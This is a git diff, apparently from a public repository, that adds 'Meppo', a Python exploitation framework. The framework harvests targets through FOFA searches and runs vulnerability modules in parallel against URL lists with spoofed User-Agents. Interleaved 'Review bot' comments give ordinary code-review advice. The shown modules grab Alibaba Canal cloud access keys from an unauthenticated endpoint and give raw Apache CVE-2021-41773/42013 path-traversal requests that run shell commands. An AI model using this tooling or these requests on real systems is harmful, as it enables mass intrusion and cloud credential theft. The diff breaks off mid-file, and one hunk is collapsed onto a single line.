diff --git a/Config/config_api.py b/Config/config_api.py
new file mode 100644
index 0000000..12c33d8
--- /dev/null
+++ b/Config/config_api.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+ ____ _ _ _ _ __ __ _
+| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
+|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
+'''
+
+########################################################################################################################
+
+# Seek 配置信息
+FOFA_EAMIL=''
+FOFA_API_KEY=''
+# 300¥会员最高设置为100,1000¥会员最高设置为10000,但可能会很慢,自行调整
+FOFA_SIZE=3
+
+########################################################################################################################
diff --git a/Config/config_banner.py b/Config/config_banner.py
new file mode 100644
index 0000000..f3ecae1
--- /dev/null
+++ b/Config/config_banner.py
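Review bot: `FOFA_EAMIL` and `FOFA_API_KEY` are meant to hold a live account e-mail and API key, yet they are literals in a tracked source file, so the moment a user fills them in the credential is committed and copied with every clone of the repository. Read them from the environment instead, `FOFA_API_KEY = os.environ.get('FOFA_API_KEY', '')` with a matching `import os`, or load a git-ignored local file, and keep the checked-in defaults empty. `FOFA_EAMIL` is also a misspelling of EMAIL; callers outside this diff may depend on it, so if the name is kept a comment such as `# sic: name kept for compatibility` would save the next reader a search.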
@@ -0,0 +1,53 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+ ____ _ _ _ _ __ __ _
+| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
+|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
+'''
+import random
+
+from Moudle.Moudle_index import PAYLOAD_NUM, MOUDLE_NUM
+
+Version = 'V 1.0'
+info = '\n\t\t漏洞利用框架 Meppo | By WingsSec | {}\n'.format(Version)
+NUM='\t\t [ {} MOUDLES\t\t{} PAYLOADS ]'.format(str(MOUDLE_NUM).center(3),str(PAYLOAD_NUM).center(3))
+
+banner1 = r'''
+ __ __
+ | \/ | ___ _ __ _ __ ___
+ | |\/| |/ _ \ '_ \| '_ \ / _ \
+ | | | | __/ |_) | |_) | (_) |
+ |_| |_|\___| .__/| .__/ \___/
+ |_| |_|
+{}{}'''.format(info,NUM)
+
+banner2 = r'''
+ _____
+ / \ ____ ______ ______ ____
+ / \ / \_/ __ \\____ \\____ \ / _ \
+/ Y \ ___/| |_> > |_> > <_> )
+\____|__ /\___ > __/| __/ \____/
+ \/ \/|__| |__|
+{}{}'''.format(info,NUM)
+
+banner3 = r'''
+ __ ___
+ / |/ /__ ____ ____ ____
+ / /|_/ / _ \/ __ \/ __ \/ __ \
+ / / / / __/ /_/ / /_/ / /_/ /
+/_/ /_/\___/ .___/ .___/\____/
+ /_/ /_/
+{}{}'''.format(info,NUM)
+
+bannerlist = [banner1, banner2, banner3]
+
+
+def Banner():
+ print(bannerlist[random.randrange(len(bannerlist))])
+
+
+if __name__ == '__main__':
+ Banner()
diff --git a/Config/config_decorators.py b/Config/config_decorators.py
new file mode 100644
index 0000000..7276e36
--- /dev/null
+++ b/Config/config_decorators.py
@@ -0,0 +1,69 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+ ____ _ _ _ _ __ __ _
+| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
+|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
+'''
+import time
+import csv
+
+#列表打印装饰器
+def Print_info(fun):
+ def work(*args,**kwargs):
+ res=fun(*args, **kwargs)
+ if res:
+ if isinstance(res, str):
+ print(res)
+ elif isinstance(res, list):
+ for i in res:
+ print(i.replace('\n',''))
+ else:
+ pass
+ return fun(*args, **kwargs)
+ return work
+
+# 结果导出装饰器
+# 保存文件类型为.rabbit,因为我不希望这个结果被记事本草率地打开,
+# 因为可能会乱,/哭唧唧,推荐notepad++、SublimeText、VScode等。
+
+def Save_info(fun):
+ def work(*args,**kwargs):
+ result=(fun(*args, **kwargs))
+ if result:
+ timetoken = str(int(time.time()))
+ filename='Output/{}_result_{}.rabbit'.format(fun.__name__,timetoken)
+ for i in result:
+ try:
+ fw = open(filename, 'a')
+ fw.write(i.replace('\n','') + '\n')
+ fw.close()
+ except:
+ pass
+ print('结果已保存至:'+filename)
+ # return fun(*args, **kwargs)
+ return work
+
+
+
+def Save_Csv(fun):
+ def work(*args,**kwargs):
+ result=(fun(*args, **kwargs))
+ if result:
+ timetoken = str(int(time.time()))
+ filename='Output/{}_result_{}.csv'.format(fun.__name__,timetoken)
+
+ with open(filename, 'a') as f:
+ head = ['host','ip','port','country','city','server','title']
+ writer = csv.writer(f)
+ # 写入一行数据
+ writer.writerow(head)
+ # 写入多行数据
+ for i in result:
+ writer.writerow(list(i.values()))
+
+ print('结果已保存至:'+filename)
+ # return fun(*args, **kwargs)
+ return work
\ No newline at end of file
diff --git a/Config/config_logging.py b/Config/config_logging.py
new file mode 100644
index 0000000..6fc1358
--- /dev/null
+++ b/Config/config_logging.py
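Review bot: `Print_info.work` runs the wrapped function twice — once into `res` and again in `return fun(*args, **kwargs)` — so every decorated call repeats all of its work, including any I/O, and may return a value different from the one it just printed; return what was already computed, `return res`. In `Save_info.work` the file is reopened for each element and the bare `except: pass` hides every write failure, so a missing `Output/` directory produces no file while '结果已保存至' is still printed; open once with `with open(filename, 'a', encoding='utf-8') as fw:` around the loop and let errors surface. `Save_Csv` should open the file with `newline=''` as the csv module requires (otherwise rows get doubled line endings on Windows), and because the name carries a one-second timestamp and mode is `'a'`, two calls within the same second append a second header row into the same file. None of the three wrappers uses `functools.wraps`, so the decorated functions lose their `__name__` and docstring.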
@@ -0,0 +1,19 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+ ____ _ _ _ _ __ __ _
+| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
+|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
+'''
+
+import logging
+
+logging.basicConfig(filename='Meppo.log',
+ format='%(asctime)s %(message)s',
+ filemode="a", level=logging.INFO)
+
+def loglog(log):
+ logging.info(log)
+
diff --git a/Config/config_port.py b/Config/config_port.py
new file mode 100644
index 0000000..f706b27
--- /dev/null
+++ b/Config/config_port.py
@@ -0,0 +1,15 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+ ____ _ _ _ _ __ __ _
+| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
+|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
+'''
+
+
+# 协议默认字典配置
+
+HTTP_PORT=['80']
+HTTPS_PORT=['443','8443']
\ No newline at end of file
diff --git a/Config/config_requests.py b/Config/config_requests.py
new file mode 100644
index 0000000..a1ddf35
--- /dev/null
+++ b/Config/config_requests.py
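Review bot: `logging.basicConfig(...)` executes at import time, so merely importing `loglog` reconfigures the root logger for the whole process, and `filename='Meppo.log'` is resolved against the current working directory, so the log lands wherever the tool happened to be launched from. Prefer a module logger, `logger = logging.getLogger(__name__)`, and call `basicConfig` once from the entry point with a configurable or absolute path. `loglog` hard-codes the `info` level; taking a `level=logging.INFO` keyword would let callers record failures at `WARNING`/`ERROR` without a second helper.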
@@ -0,0 +1,78 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ +''' + +# from fake_useragent import UserAgent +# +# # 实例化 UserAgent 类 +# ua = UserAgent(verify_ssl=False) +# +# # 通用headers配置 +# headers={"User-Agent":ua.random} +# +# if __name__ == '__main__': +# print(headers) + +import random + +ua=random.choice([ +"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", +"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", +"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/36.0.1985.67 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", +"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", +"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", +"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36", +"Mozilla/5.0 (X11; CrOS i686 4319.74.0) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36", +"Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36", +"Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17", +"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15", +"Mozilla/5.0 (Windows 
NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14"]) + +headers={"User-Agent":ua} + +if __name__ == '__main__': + print(headers) \ No newline at end of file diff --git a/Framework/console_attack.py b/Framework/console_attack.py new file mode 100644 index 0000000..2f1142a --- /dev/null +++ b/Framework/console_attack.py 
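Review bot: The first block of the file is commented-out code (the `fake_useragent` variant) that duplicates what the live code below does; delete it rather than carry it as a comment, since version history keeps it. `headers` is a module-level dict that every importer shares, so any module that mutates it (adding a header for its own request) changes it for all others; either document that callers must copy it, `dict(headers)`, or expose a small function that returns a fresh dict. The list literal would also read better bound to a named constant, with `ua = random.choice(USER_AGENTS)` on its own line.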
@@ -0,0 +1,73 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+ ____ _ _ _ _ __ __ _
+| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
+|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
+'''
+import datetime
+from multiprocessing import Pool, Manager
+from Tools.ReBuild import get_payload
+from Config.config_logging import loglog
+from Moudle.Moudle_index import *
+
+def urlcheck(url):
+ if 'http' in url:
+ return url
+ else:
+ return ('http://'+str(url))
+
+def get_urls(file):
+ f=open(file,'r')
+ r=f.readlines()
+ f.close()
+ res=[]
+ for i in r:
+ res.append(urlcheck(i).replace('\n',''))
+ return res
+
+def record_res(dic):
+ if dic:
+ res='['+datetime.datetime.now().strftime('%X')+'] '
+ for key in dic:
+ value = dic[key]
+ res=res+str(key)+' : '+str(value)+'\t'
+ print(res)
+ loglog(res)
+
+
+def pocs(target,moudle,q):
+ q.put(target)
+ return eval(moudle).poc(target)
+
+def poolmana(moudle,urls):
+ p = Pool(30)
+ q = Manager().Queue()
+ print('任务加载数量:'+str(len(urls)))
+ for i in urls:
+ p.apply_async(pocs, args=(i,moudle,q,),callback=record_res)
+ p.close()
+ p.join()
+
+
+def run_poc(*args):
+ if len(args)==2:
+ if isinstance(args[1],str):
+ record_res(eval(args[0]).poc(urlcheck(args[1])))
+ elif isinstance(args[1], list):
+ poolmana(args[0], args[1])
+
+def run_moudle(*args):
+ if len(args)==2:
+ if isinstance(args[1],str):
+ for i in get_payload(args[0]):
+ record_res(eval(i[0]).poc(urlcheck(args[1])))
+ elif isinstance(args[1], list):
+ for i in get_payload(args[0]):
+ poolmana(i[0], args[1])
+
+
+if __name__ == '__main__':
+ run_poc('zabbix_admin',"http://127.0.0.1")
diff --git a/Framework/console_list.py b/Framework/console_list.py
new file mode 100644
index 0000000..a1c1952
--- /dev/null
+++ b/Framework/console_list.py
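Review bot: `pocs`, `run_poc` and `run_moudle` resolve the module name with `eval(moudle)` / `eval(args[0])` / `eval(i[0])`, and that value comes straight from the `-poc`/`-m` command-line options, so any Python expression typed there is executed inside the framework process instead of being rejected as an unknown module. Because the modules reach this file through the star import of `Moudle.Moudle_index`, a namespace lookup should be a drop-in replacement: `mod = globals().get(moudle)`, then `if mod is None: raise ValueError('unknown moudle: ' + moudle)` and `return mod.poc(target)`. `get_urls` should read the file with `with open(file) as f:` so the handle is closed even when `readlines()` fails, and `urlcheck`'s `'http' in url` is a substring test that also accepts a bare host containing the letters http, so `url.startswith(('http://', 'https://'))` is the intended check. The `q` queue created in `poolmana` is filled by every worker but never read, so it only costs a Manager process.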
@@ -0,0 +1,55 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ +''' +from Tools.ReBuild import get_moudle, get_payload + +def get_cn_number(char): + count = 0 + for item in char: + if 0x4E00 <= ord(item) <= 0x9FA5: + count += 1 + return count + +def moudle_list(): + list=get_moudle() + print('【Moudle List】'.center(30)) + print('================================') + for i in list: + print('--------------------------------') + print('|{}|'.format(i.center(30-get_cn_number(i)))) + print('================================') + + + +def payload_list(moudle): + list=get_payload(moudle) + print('【Payload List】'.center(110)) + print('==================================================================================================================') + print('|{}|{}|{}|'.format('Moudle'.center(20),'Payload'.center(30), 'Remark'.center(60))) + for i in list: + print('------------------------------------------------------------------------------------------------------------------') + print('|{}|{}|{}|'.format(moudle.center(20),i[0].center(30-get_cn_number(i[0])),i[1].center(60-get_cn_number(i[1])))) + print('==================================================================================================================') + + +def payload_list_all(): + print('【Payload List】'.center(110)) + print('==================================================================================================================') + print('|{}|{}|{}|'.format('Moudle'.center(20),'Payload'.center(30), 'Remark'.center(60))) + for i in get_moudle(): + list = get_payload(i) + + + for j in list: + print('------------------------------------------------------------------------------------------------------------------') + 
print('|{}|{}|{}|'.format(i.center(20-get_cn_number(i)),j[0].center(30-get_cn_number(j[0])),j[1].center(60-get_cn_number(j[1])))) + print('==================================================================================================================') + +if __name__ == '__main__': + payload_list_all() \ No newline at end of file diff --git a/Framework/console_main.py b/Framework/console_main.py new file mode 100644 index 0000000..b43d18f --- /dev/null +++ b/Framework/console_main.py 
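Review bot: `moudle_list`, `payload_list` and `payload_list_all` each bind a local named `list`, shadowing the builtin for the rest of the function body; rename them to `moudles` / `payloads`. `get_cn_number` counts only the CJK Unified Ideographs range `0x4E00–0x9FA5`, so full-width punctuation such as the `【` `】` in the headings is treated as single-width and the table borders drift by one column per such character; `sum(unicodedata.east_asian_width(ch) in ('W', 'F') for ch in char)` with `import unicodedata` covers both. The long `'===='`/`'----'` rule strings are repeated in three places and would be easier to keep aligned as one module-level constant each.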
@@ -0,0 +1,79 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ +''' +import argparse +from Framework import console_attack +from Seek import fofaapi +from Framework.console_attack import get_urls +from Framework.console_list import moudle_list, payload_list, payload_list_all +from Moudle.Moudle_index import * + + + +def Console(): + parser = argparse.ArgumentParser() + M_POC = parser.add_argument_group('漏洞检测模块') + M_SEEK = parser.add_argument_group('资产爬取模块') + +######################################################################################################################## + parser.add_argument("-l", dest='list',help="list",action='store_true') + parser.add_argument("-ll", dest='listall',help="list all",action='store_true') + parser.add_argument("-m", dest='moudle',help="moudle") + parser.add_argument("-u", dest='url',help="target url") + parser.add_argument("-f", dest='file',help="the file of target list") + + + #漏洞检测模块 + M_POC.add_argument("-poc", dest='poc',help="漏洞检测") + + + #资产爬取模块 + M_SEEK.add_argument("-fofa", dest='fofa',help="资产爬取") + M_SEEK.add_argument("-num", dest='num',help="资产数量") + + args = parser.parse_args() + +######################################################################################################################## + + if args.fofa: + if args.num and int(args.num) > 10000: + print("Num Don't > 10000 PLS~") + else: + fofaapi.run(args.fofa, 1000) + elif args.poc: + try: + if args.url: + console_attack.run_poc(args.poc, args.url) + elif args.file: + console_attack.run_poc(args.poc, get_urls(args.file)) + else: + print("Usage:\n\tpython Meppo.py -poc xxx -u http:xxx\n\tpython Meppo.py -poc xxx -f target.txt") + except: + print("Usage:\n\tpython Meppo.py -poc xxx -u http:xxx\n\tpython Meppo.py -poc 
xxx -f target.txt") + elif args.moudle: + try: + if args.list: + payload_list(args.moudle) + elif args.url: + console_attack.run_moudle(args.moudle, args.url) + elif args.file: + console_attack.run_moudle(args.moudle, get_urls(args.file)) + else: + print("Usage:\n\tpython Meppo.py -m -l\n\tpython Meppo.py -m xxx -u http:xxx\n\tpython Meppo.py -m -f target.txt") + except: + print("Usage:\n\tpython Meppo.py -m -l\n\tpython Meppo.py -m xxx -u http:xxx\n\tpython Meppo.py -m -f target.txt") + elif args.list: + moudle_list() + elif args.listall: + payload_list_all() + else: + print("Usage:\n\tStep 1: python Meppo.py -l\n\tStep 2: python Meppo.py -m xxx -l\n\tStep 3: python Meppo.py -m / -poc \n\t") + + +######################################################################################################################## diff --git a/Meppo.py b/Meppo.py new file mode 100644 index 0000000..561b513 --- /dev/null +++ b/Meppo.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +from time import sleep + +from Tools.ReBuild import Rebuild +Rebuild() + +sleep(1) + +from Config.config_banner import Banner +from Framework.console_main import Console + +if __name__ == '__main__': + Banner() + Console() diff --git a/Moudle/AlibabaCanal/Alibaba_Canal_Info_Leak.md b/Moudle/AlibabaCanal/Alibaba_Canal_Info_Leak.md new file mode 100644 index 0000000..09f1379 --- /dev/null +++ b/Moudle/AlibabaCanal/Alibaba_Canal_Info_Leak.md 
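Review bot: `-num` is parsed and range-checked (`int(args.num) > 10000`) but then ignored — `fofaapi.run(args.fofa, 1000)` passes a hard-coded 1000 whatever the user supplied, and a non-numeric `-num` raises an uncaught `ValueError` before the check; either pass the parsed value or drop the option so the help text and behaviour agree. The two bare `except:` blocks around the `-poc` and `-m` branches turn every failure inside a module (import error, connection error, a bug in the module, even Ctrl-C) into the same usage message, so real errors are indistinguishable from a typo on the command line; catch the exceptions you actually expect, or at least record the traceback with `logging.exception(...)` before printing usage. The `-l` flag is also documented as `-m xxx -l` yet the `elif args.list` branch only runs when no `-m` is given, which the usage text does not say.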
@@ -0,0 +1,30 @@ +# Alibaba Canal config 云密钥信息泄露漏洞 + +## 漏洞描述 + +由于/api/v1/canal/config 未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露 + +## 漏洞影响 + +> [!NOTE] +> +> Alibaba Canal + +## FOFA + +> [!NOTE] +> +> title="Canal Admin" + +## 漏洞复现 + +验证漏洞的Url为 + +``` +/api/v1/canal/config/1/0 +``` + +![image-20210827144737848](images/image-20210827144737848.png) + +其中泄露了 aliyun.access 密钥,可以控制密钥下的所有服务器 + diff --git a/Moudle/AlibabaCanal/Alibaba_Canal_Info_Leak.py b/Moudle/AlibabaCanal/Alibaba_Canal_Info_Leak.py new file mode 100644 index 0000000..93e979e --- /dev/null +++ b/Moudle/AlibabaCanal/Alibaba_Canal_Info_Leak.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + + +import requests +from Config.config_requests import ua + +requests.packages.urllib3.disable_warnings() + +# 脚本信息 +###################################################### +NAME = 'Alibaba_Canal_Info_Leak' +AUTHOR = "JDQ" +REMARK = 'Alibaba Canal config 云密钥信息泄露漏洞' +FOFA_RULE = 'title="Canal Admin"' +###################################################### + + +def poc(target): + headers={ + "User-Agent":ua + } + try: + r = requests.get(target+"/api/v1/canal/config/1/0",headers=headers, verify=False) + if r.status_code == 200 and 'aliyun' in r.text: + return(r.text) + except : + pass + + + +if __name__ == '__main__': + poc("127.0.0.1") diff --git a/Moudle/AlibabaCanal/images/image-20210827144737848.png b/Moudle/AlibabaCanal/images/image-20210827144737848.png new file mode 100644 index 0000000..412a57e Binary files /dev/null and b/Moudle/AlibabaCanal/images/image-20210827144737848.png differ diff --git a/Moudle/Apache/CVE_2021_41773.md b/Moudle/Apache/CVE_2021_41773.md new file mode 100644 index 0000000..5afdfed --- /dev/null +++ b/Moudle/Apache/CVE_2021_41773.md 
@@ -0,0 +1,49 @@ +# 漏洞简述 + +Apache 中间件http服务存在目录穿越漏洞,如果文档根目录以外的文件不受`require all denied`保护,则攻击者可以访问这些文件。 + +![image](C:\Users\jie\Downloads\image.png) + +# 影响范围 + +2.4.49---CVE-2021-41773 + +2.4.50---CVE-2021-42013 + +# 漏洞复现 + +需要apahce开着mod_cgi,如下图 + +![img](https://cdn.nlark.com/yuque/0/2021/png/21923359/1633937873113-96d33f3b-0b70-4b2a-9170-80df1d93d0d9.png) + +POST包(2.4.49版本): + +```java +GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Content-Length: 7 + +echo;id +``` + +使用cgi,目录穿越到/bin/bash,可以执行bash命令,即可实现RCE; + +POST包(2.4.50版本): + +2.4.50版本的漏洞与2.4.49版本是一个位置,只是官方修复不严格,而出现的一次绕过,对比一下,发现是对.的URL编码中的2和e再次做了一次URL编码; + +**注:2.4.50版本暂未找到环境测试验证,网上流传的是用的这个poc,下方脚本中的2.4.50版本的部分也是未实际做验证** + +``` +GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Content-Length: 7 + +echo;id +``` + +# poc + +编写脚本时,遇到一个坑,用burp测试没有问题的poc,即URL部分,Python请求有问题,大概内容为Your browser sent a request that this server could not understand. ,最终一点点测试,用wireshark对请求抓包,发现是Python请求时,会自动先做一次URL解码,但却不对%25解码,所以就有了下面的poc,与上面burp的poc对比一下就明白了。 \ No newline at end of file diff --git a/Moudle/Apache/CVE_2021_41773.py b/Moudle/Apache/CVE_2021_41773.py new file mode 100644 index 0000000..a9bf84a --- /dev/null +++ 